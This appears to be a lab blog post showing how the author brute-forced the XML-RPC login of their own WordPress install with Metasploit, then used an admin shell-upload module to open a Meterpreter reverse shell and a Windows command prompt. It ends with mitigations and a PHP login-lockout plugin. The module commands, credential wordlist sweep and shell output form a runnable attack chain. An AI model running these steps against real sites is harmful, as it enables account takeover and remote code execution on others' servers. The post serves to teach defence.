OS access through WordPress - Securing your WordPress site

This was done in my personal lab. I carried this out mainly out of curiosity, because I fell in love with WordPress because of the simplicity with which websites can be deployed, though, to be honestly fair, probably because I don't want to do a lot of graphics and CSS, not to mention the many free plugins.

This was carried out on a Windows 10 system running WAMP and WordPress, though I don't think it being WAMP or Windows 10 has any bearing on this attack; being Windows 10 or a higher patched version does mean you might not be able to elevate privileges with simple commands like getsystem etc.

My biggest worry with WordPress has always been its lack of a password attempt count and lockout mechanism. This makes it very open to login brute-force attacks and credential username_password files, so I set out to see what Metasploit had with reference to these credential scanners, and the list is quite interesting; some examples are below:

Name Disclosure Date Rank Description
 ---- --------------- ---- -----------
 auxiliary/admin/http/wp_custom_contact_forms 2014-08-07 normal WordPress custom-contact-forms Plugin SQL Upload
 auxiliary/admin/http/wp_easycart_privilege_escalation 2015-02-25 normal WordPress WP EasyCart Plugin Privilege Escalation
 auxiliary/admin/http/wp_wplms_privilege_escalation 2015-02-09 normal WordPress WPLMS Theme Privilege Escalation
 auxiliary/dos/http/wordpress_long_password_dos 2014-11-20 normal WordPress Long Password DoS
 auxiliary/dos/http/wordpress_xmlrpc_dos 2014-08-06 normal WordPress XMLRPC DoS
 auxiliary/gather/wp_all_in_one_migration_export 2015-03-19 normal WordPress All-in-One Migration Export
 auxiliary/gather/wp_ultimate_csv_importer_user_extract 2015-02-02 normal WordPress Ultimate CSV Importer User Table Extract
 auxiliary/gather/wp_w3_total_cache_hash_extract normal WordPress W3-Total-Cache Plugin 0.9.2.4 (or before) Username and Hash Extract
 auxiliary/scanner/http/wordpress_cp_calendar_sqli 2015-03-03 normal WordPress CP Multi-View Calendar Unauthenticated SQL Injection Scanner
 auxiliary/scanner/http/wordpress_ghost_scanner normal WordPress XMLRPC GHOST Vulnerability Scanner
 auxiliary/scanner/http/wordpress_login_enum normal WordPress Brute Force and User Enumeration Utility
 auxiliary/scanner/http/wordpress_multicall_creds normal WordPress XML-RPC system.multicall Credential Collector
 auxiliary/scanner/http/wordpress_pingback_access normal WordPress Pingback Locator
 auxiliary/scanner/http/wordpress_scanner normal WordPress Scanner
 auxiliary/scanner/http/wordpress_xmlrpc_login normal WordPress XML-RPC Username/Password Login Scanner
 auxiliary/scanner/http/wp_contus_video_gallery_sqli 2015-02-24 normal WordPress Contus Video Gallery Unauthenticated SQL Injection Scanner
 auxiliary/scanner/http/wp_dukapress_file_read normal WordPress DukaPress Plugin File Read Vulnerability
 auxiliary/scanner/http/wp_gimedia_library_file_read normal WordPress GI-Media Library Plugin Directory Traversal Vulnerability
 auxiliary/scanner/http/wp_mobile_pack_info_disclosure normal WordPress Mobile Pack Information Disclosure Vulnerability
 auxiliary/scanner/http/wp_mobileedition_file_read normal WordPress Mobile Edition File Read Vulnerability
 auxiliary/scanner/http/wp_nextgen_galley_file_read normal WordPress NextGEN Gallery Directory Read Vulnerability
 auxiliary/scanner/http/wp_simple_backup_file_read normal WordPress Simple Backup File Read Vulnerability
 auxiliary/scanner/http/wp_subscribe_comments_file_read normal WordPress Subscribe Comments File Read Vulnerability

— In this example I used auxiliary/scanner/http/wordpress_xmlrpc_login:

msf > use auxiliary/scanner/http/wordpress_xmlrpc_login
msf auxiliary(wordpress_xmlrpc_login) > show options
Module options (auxiliary/scanner/http/wordpress_xmlrpc_login):
Name Current Setting Required Description
 ---- --------------- -------- -----------
 BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
 DB_ALL_CREDS false no Try each user/password couple stored in the current database
 DB_ALL_PASS false no Add all passwords in the current database to the list
 DB_ALL_USERS false no Add all users in the current database to the list
 PASSWORD no A specific password to authenticate with
 PASS_FILE no File containing passwords, one per line
 Proxies no A proxy chain of format type:host:port[,type:host:port][...]
 RHOSTS 192.168.0.1 yes The target address range or CIDR identifier
 RPORT 80 yes The target port
 SSL false no Negotiate SSL/TLS for outgoing connections
 STOP_ON_SUCCESS true yes Stop guessing when a credential works for a host
 TARGETURI /wp yes The base path to the wordpress application
 THREADS 1 yes The number of concurrent threads
 USERNAME no A specific username to authenticate as
 USERPASS_FILE /usr/share/wordlists/metasploit/http_default_userpass.txt no File containing users and passwords separated by space, one pair per line
 USER_AS_PASS false no Try the username as the password for all users
 USER_FILE no File containing usernames, one per line
 VERBOSE true yes Whether to print output for all attempts
 VHOST no HTTP server virtual host
msf auxiliary(wordpress_xmlrpc_login) >
-- Running the XML-RPC scanner yielded results (of course I had put the correct username and password in the file, but this is a lab ;) )
 msf auxiliary(wordpress_xmlrpc_login) > run

[*] 192.168.0.1:80 :/wp/xmlrpc.php - Sending Hello...
 [+] XMLRPC enabled, Hello message received!
 [*] Starting XML-RPC login sweep...
 [-] WORDPRESS_XMLRPC - Failed: 'connect:connect'
 [-] WORDPRESS_XMLRPC - Failed: 'sitecom:sitecom'
 [-] WORDPRESS_XMLRPC - Failed: 'admin:1234'
 [-] WORDPRESS_XMLRPC - Failed: 'cisco:cisco'
 [-] WORDPRESS_XMLRPC - Failed: 'cisco:sanfran'
 [-] WORDPRESS_XMLRPC - Failed: 'private:private'
 [-] WORDPRESS_XMLRPC - Failed: 'wampp:xampp'
 [-] WORDPRESS_XMLRPC - Failed: 'newuser:wampp'
 [-] WORDPRESS_XMLRPC - Failed: 'xampp-dav-unsecure:ppmax2011 '
 [-] WORDPRESS_XMLRPC - Failed: 'admin:turnkey'
 [-] WORDPRESS_XMLRPC - Failed: 'vagrant:vagrant'
 [+] WORDPRESS_XMLRPC - Success: 'admin:wp'
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
 msf auxiliary(wordpress_xmlrpc_login) >

— With the username and password, I needed to gain access to this system, so I used the module below:
exploit/unix/webapp/wp_admin_shell_upload 2015-02-21 excellent WordPress Admin Shell Upload

msf exploit(wp_admin_shell_upload) > show options

Module options (exploit/unix/webapp/wp_admin_shell_upload):

Name Current Setting Required Description
 ---- --------------- -------- -----------
 PASSWORD wp yes The WordPress password to authenticate with
 Proxies no A proxy chain of format type:host:port[,type:host:port][...]
 RHOST 192.168.0.1 yes The target address
 RPORT 80 yes The target port
 SSL false no Negotiate SSL/TLS for outgoing connections
 TARGETURI /wp yes The base path to the wordpress application
 USERNAME admin yes The WordPress username to authenticate with
 VHOST no HTTP server virtual host
 Exploit target:

Id Name
 -- ----
 0 WordPress
 msf exploit(wp_admin_shell_upload) >
-- I tried a check to see if I could validate before doing anything, but that isn't supported by this module:

 msf exploit(wp_admin_shell_upload) > check
 [*] 192.168.0.1:80 This module does not support check.
 msf exploit(wp_admin_shell_upload) >

msf exploit(wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 192.168.0.2:4444
 [*] Authenticating with WordPress using admin:wp...
 [+] Authenticated with WordPress
 [*] Preparing payload...
 [*] Uploading payload...
 [*] Executing the payload at /wp/wp-content/plugins/JhQupUiFGr/EqiugYHZzJ.php...
 [*] Sending stage (33721 bytes) to 192.168.0.1
 [*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.1:55374) at 2016-12-24 18:18:23 +0300
 [+] Deleted EqiugYHZzJ.php
 [+] Deleted JhQupUiFGr.php

meterpreter > shell
 Process 8780 created.
 Channel 0 created.
 Microsoft Windows [Version 10.0.14393]
 (c) 2016 Microsoft Corporation. All rights reserved.

C:\wamp64\www\wp\wp-content\plugins\JhQupUiFGr>

— Trying to move further resulted in another error, though this demonstration is to show how easy it is to move from a WordPress page that doesn't have login timeouts to getting shell access:

-- Below is the error I got, for example; in different scenarios all was fine. I suspect it has to do with Windows 10 security, but I didn't dig into this a lot more.
 C:\wamp64\www\wp\wp-content\plugins\JhQupUiFGr>cd c:\

Terminate channel 0? [y/N] y
 [-] Error running command shell: Rex::TimeoutError Operation timed out.
 meterpreter >

Mitigation

  • Introduce CAPTCHAs on your WordPress site
  • Implement two-factor authentication
  • Implement login count (lockout) plugins
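The lockout mechanism the third bullet asks for can be written as a small must-use plugin. This is an added example, not code from the original post or from any existing plugin; the limits (5 failures, 15-minute window) and the lab_ function names are assumptions. Because XML-RPC logins also go through wp_authenticate(), the same counter covers the xmlrpc.php sweep shown above.

```php
<?php
/*
Plugin Name: Lab Login Lockout (added example, drop into wp-content/mu-plugins/)
Description: Counts failed logins per client IP and refuses further attempts
             during a cooldown window. Covers wp-login.php and xmlrpc.php.
*/

// Tunables (assumed values; adjust to taste).
define( 'LAB_LOCKOUT_MAX_FAILS', 5 );
define( 'LAB_LOCKOUT_WINDOW', 15 * MINUTE_IN_SECONDS );

// Transient key scoped to the requesting address. Behind a reverse proxy you
// would have to take the client address from a trusted forwarded header instead.
function lab_lockout_key() {
    return 'lab_lockout_' . md5( $_SERVER['REMOTE_ADDR'] );
}

// Step 1: refuse the login while the address is locked out. The
// wp_authenticate_user filter runs after the user lookup but before
// wp_check_password(), so a locked-out client never gets a password check.
add_filter( 'wp_authenticate_user', function ( $user, $password ) {
    if ( (int) get_transient( lab_lockout_key() ) >= LAB_LOCKOUT_MAX_FAILS ) {
        return new WP_Error( 'lab_locked_out',
            'Too many failed logins from your address. Try again later.' );
    }
    return $user;
}, 99, 2 );

// Step 2: count each failure. wp_authenticate() fires this action for both the
// login form and XML-RPC. Attempts made while locked out also count, so each
// one renews the window (set_transient resets the expiry).
add_action( 'wp_login_failed', function ( $username ) {
    $key   = lab_lockout_key();
    $fails = (int) get_transient( $key ) + 1;
    set_transient( $key, $fails, LAB_LOCKOUT_WINDOW );
    error_log( sprintf( 'login failed for %s from %s (%d/%d)',
        $username, $_SERVER['REMOTE_ADDR'], $fails, LAB_LOCKOUT_MAX_FAILS ) );
} );

// Step 3: a successful login clears the counter for that address.
add_action( 'wp_login', function () {
    delete_transient( lab_lockout_key() );
} );

// Optional: if nothing on the site needs XML-RPC (Jetpack, mobile apps,
// pingbacks), disable it outright; system.multicall otherwise lets a single
// request carry many login attempts, which is what wordpress_multicall_creds uses.
add_filter( 'xmlrpc_enabled', '__return_false' );
```

Transients fall back to the options table without an object cache, so on a busy site back this with a persistent cache; the error_log() line gives you something to alert on in the PHP error log.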

The above makes password guessing and brute-forcing difficult, especially by bots and automated tools. There are other ways of gaining access, for example bugs in older versions of WordPress, old versions of the templates you use, and old versions of the plugins you have active; these must be kept current, because each latest release has a fix for something you might not be aware of.

Newer versions might also have some vulnerabilities, but it is safe to say they are known by very few and are usually patched the moment the plugin/template or WordPress team knows about them.
